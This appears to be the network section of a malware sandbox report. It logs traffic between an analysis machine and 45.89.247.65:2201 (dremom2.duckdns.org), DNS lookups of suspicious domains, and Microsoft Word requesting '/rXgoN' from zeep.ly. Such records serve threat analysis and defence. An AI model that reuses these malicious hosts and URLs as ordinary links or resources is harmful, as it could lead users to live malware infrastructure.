                                        Sep 9, 2024 17:35:54.449131012 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.453998089 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.454566002 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.464576960 CEST22014917545.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.464947939 CEST491752201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.467339039 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.467403889 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.467447042 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.472281933 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.663018942 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.780564070 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.782227039 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.785729885 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.785841942 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787220955 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787333012 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787564039 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787616014 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787663937 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787691116 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.788012028 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.789848089 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.793071985 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.793133020 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.793164015 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.793190956 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.793217897 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.793299913 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.794481039 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.794709921 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.794898033 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.794946909 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.794974089 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.795022964 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.795049906 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.800559998 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.800672054 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.258732080 CEST491752201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:55.294975042 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.295484066 CEST22014917545.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.422646999 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:55.424815893 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:55.427735090 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.427781105 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.427874088 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.427902937 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.427930117 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.427957058 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.428004980 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.428033113 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.428059101 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.428086042 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.428112030 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.428158045 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.428184986 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.428210974 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.430691957 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:55.432729006 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.432777882 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.432809114 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.432894945 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.433015108 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.433222055 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.433248997 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.435899019 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:55.436018944 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.436125040 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.436182022 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.436223030 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.436253071 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.436327934 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.436357021 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.437628031 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:55.440965891 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.441047907 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.441080093 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.441180944 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.441207886 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.441235065 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.441340923 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.442851067 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.442877054 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:55.900351048 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.014235020 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.016163111 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.019292116 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019332886 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019360065 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019458055 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019485950 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019512892 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019539118 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019587994 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019614935 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019642115 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019669056 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.019694090 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.024276972 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.024307013 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.024333954 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.024363041 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.024411917 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.024439096 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.024466038 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.024497986 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.024585962 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.024617910 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.026451111 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.028323889 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.031596899 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.031708956 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.032902002 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.033216953 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.033266068 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.033298016 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.033365965 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.033469915 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.033497095 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.033523083 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.039335012 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.039474964 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.296772003 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.478360891 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.480567932 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.483397007 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483414888 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483472109 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483483076 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483511925 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483603001 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483613014 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483644009 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483675957 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483686924 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483731031 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483773947 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483783960 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.483793974 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.485497952 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.486301899 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.488301039 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.488379002 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.488411903 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.488533020 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.488543034 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.488553047 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.488761902 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.490988016 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.491336107 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.491465092 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.493340969 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.493483067 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.493561983 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.493571997 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.495810032 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.496247053 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.496428013 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.496437073 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.496715069 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.500833035 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.500906944 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.500916958 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.500933886 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.500982046 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.836376905 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.922168016 CEST4917480192.168.2.22178.237.33.50
                                        Sep 9, 2024 17:35:56.953092098 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.954910040 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.959738970 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.959777117 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.959785938 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.959794044 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.959868908 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.959877968 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.959884882 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.961760998 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.961770058 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.965894938 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.965959072 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.965967894 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.965976000 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.966063976 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.966542006 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.966655970 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.966665030 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.967763901 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.967860937 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.967869997 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.968090057 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.968170881 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.970083952 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.974847078 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.975083113 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.975161076 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.976505995 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.976548910 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.976696014 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.976805925 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.977005005 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.977056026 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.977128029 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.977135897 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.977855921 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:56.982996941 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.983100891 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:56.983294964 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.260328054 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.302082062 CEST4917480192.168.2.22178.237.33.50
                                        Sep 9, 2024 17:35:57.383506060 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:57.385701895 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:57.388520956 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388535023 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388577938 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388587952 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388659954 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388669014 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388717890 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388726950 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388752937 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388849974 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388859034 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388868093 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388905048 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.388914108 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.390629053 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.390661955 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.390748024 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.390788078 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.390852928 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.390876055 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.391251087 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:57.393477917 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:57.396610975 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.396663904 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.396850109 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.396934032 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.396998882 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.397007942 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.398370028 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.398430109 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.398432016 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:57.398530960 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.398710012 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.403938055 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.763464928 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.890855074 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:57.893007994 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:57.895967007 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896063089 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896092892 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896121025 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896171093 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896198034 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896224976 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896272898 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896301031 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896327972 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896353960 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896380901 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896430016 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.896457911 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:57.899214029 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:57.900759935 CEST22014917745.89.247.65192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Sep 9, 2024 17:34:23.285903931 CEST192.168.2.228.8.8.80x7334Standard query (0)zeep.lyA (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:24.239650011 CEST192.168.2.228.8.8.80xa3daStandard query (0)zeep.lyA (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:24.248281002 CEST192.168.2.228.8.8.80x9636Standard query (0)zeep.lyA (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:29.208755970 CEST192.168.2.228.8.8.80xc083Standard query (0)zeep.lyA (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:29.216810942 CEST192.168.2.228.8.8.80x1100Standard query (0)zeep.lyA (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:38.493577957 CEST192.168.2.228.8.8.80x71eeStandard query (0)ia601706.us.archive.orgA (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:42.622163057 CEST192.168.2.228.8.8.80x1140Standard query (0)dremom2.duckdns.orgA (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:44.311072111 CEST192.168.2.228.8.8.80x208bStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Sep 9, 2024 17:34:23.301367998 CEST8.8.8.8192.168.2.220x7334No error (0)zeep.ly95.217.202.210A (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:24.246395111 CEST8.8.8.8192.168.2.220xa3daNo error (0)zeep.ly95.217.202.210A (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:24.288400888 CEST8.8.8.8192.168.2.220x9636No error (0)zeep.ly95.217.202.210A (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:29.215455055 CEST8.8.8.8192.168.2.220xc083No error (0)zeep.ly95.217.202.210A (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:29.224106073 CEST8.8.8.8192.168.2.220x1100No error (0)zeep.ly95.217.202.210A (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:38.505302906 CEST8.8.8.8192.168.2.220x71eeNo error (0)ia601706.us.archive.org207.241.227.96A (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:42.719347000 CEST8.8.8.8192.168.2.220x1140No error (0)dremom2.duckdns.org45.89.247.65A (IP address)IN (0x0001)false
                                        Sep 9, 2024 17:34:44.321476936 CEST8.8.8.8192.168.2.220x208bNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.224916195.217.202.210803320C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 17:34:23.309561014 CEST129OUTOPTIONS / HTTP/1.1
                                        User-Agent: Microsoft Office Protocol Discovery
                                        Host: zeep.ly
                                        Content-Length: 0
                                        Connection: Keep-Alive
                                        Sep 9, 2024 17:34:23.969957113 CEST463INHTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:23 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/
                                        Content-Length: 224
                                        Keep-Alive: timeout=10, max=5000
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 65 65 70 2e 6c 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://zeep.ly/">here</a>.</p></body></html>
                                        Sep 9, 2024 17:34:31.117149115 CEST343OUTGET /rXgoN HTTP/1.1
                                        Accept: */*
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        Host: zeep.ly
                                        Connection: Keep-Alive
                                        Sep 9, 2024 17:34:31.321489096 CEST473INHTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:31 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/rXgoN
                                        Content-Length: 229
                                        Keep-Alive: timeout=10, max=4999
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 65 65 70 2e 6c 79 2f 72 58 67 6f 4e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
